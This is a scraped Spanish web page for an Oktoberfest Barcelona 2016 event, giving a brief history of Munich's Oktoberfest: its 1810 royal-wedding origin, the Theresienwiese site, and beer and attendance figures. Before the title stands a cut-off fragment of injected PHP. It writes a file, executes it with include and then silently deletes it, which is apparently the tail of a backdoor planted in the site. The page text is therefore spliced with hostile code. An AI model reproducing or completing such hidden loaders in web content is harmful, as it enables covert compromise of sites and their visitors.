");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Oktoberfest Barcelona 2016 | Historia Oktoberfest | Fiesta de la Cerveza

Historia de la Oktoberfest

Historia de la Oktoberfest

La Oktoberfest original, también conocida como La Fiesta de la Cerveza, es una de las celebraciones históricas y culturales del pueblo alemán que se realiza en la ciudad bávara de Munich, y que en la actualidad está considerada como la fiesta popular más grande del mundo.

Esta fiesta se realiza anualmente entre los meses de septiembre y octubre, desde sus inicios en 1810, año en el que se celebró el matrimonio del príncipe Luís I de Baviera con la princesa Teresa de Sajonia-Altenburgo y para el cual se invitó a los ciudadanos de la ciudad.

Los festejos duraron varios días sobre el Theresienwiese, también conocido como Wiesn, un campo abierto justo al lado de la muralla de Munich.

Por ello, tras el éxito de la primera Fiesta de la Cerveza se pensó seguir celebrando el festival, llegando a celebrarse en el año de 1910, el centenario de la Oktoberfest, donde se sirvieron 12.000 hectolitros de cerveza..

Actualmente, durante las tres semanas que dura el Oktoberfest de Munich, se consumen más de 7.500.000 de litros y tiene una asistencia de unos 6.000.000 de personas, procedentes de todas las partes del mundo.